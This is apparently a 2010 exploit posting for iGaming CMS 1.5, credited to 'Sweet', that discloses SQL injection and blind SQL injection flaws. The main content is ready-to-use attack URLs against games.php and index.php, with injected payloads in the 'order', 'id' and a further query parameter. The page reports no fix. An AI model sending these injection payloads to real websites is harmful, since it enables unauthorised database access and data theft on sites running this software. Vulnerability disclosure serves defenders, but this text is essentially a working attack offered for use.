iGaming CMS Multiple SQL Injection Vulnerabilities

2010-08-27 09:16:35

############################################################################
# #
# Exploit Title: iGamingCMS1.5 multiple vulnirabilities #
# #
# Date: 27/08/2010 #
# #
# Author: Sweet #
# #
# Contact : [email protected] #
# #
# Software Link: http://www.igamingcms.com/ #
# #
# Download: http://forums.igamingcms.com/forumdisplay.php?f=5 #
# #
# Version:1.5 #
# #
# Tested on: WinXp sp3 #
# #
# Risk : hight #
# #
# #
# Description : iGaming CMS is a content management #
# system designed for gaming websites. #
# #
# #
# #
############################################################################

1-SQL injection:

http://www.example.com/igamingpath/games.php?order=1[SQLi]&[email protected]&sort=desc

2-Blind injection:

http://www.example.com/igamingpath/games.php?order=title&[email protected]'+and+31337-31337='0&sort=desc

http://www.example.com/igamingpath/index.php?do=viewarticle&id=1'+and+31337-31337='0


thx to Milw0rm.com , JF - Hamst0r - Keystroke , inj3ct0r.com , exploit-db.com

Saha Ftourkoum et 1,2,3 viva L'Algerie :))

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.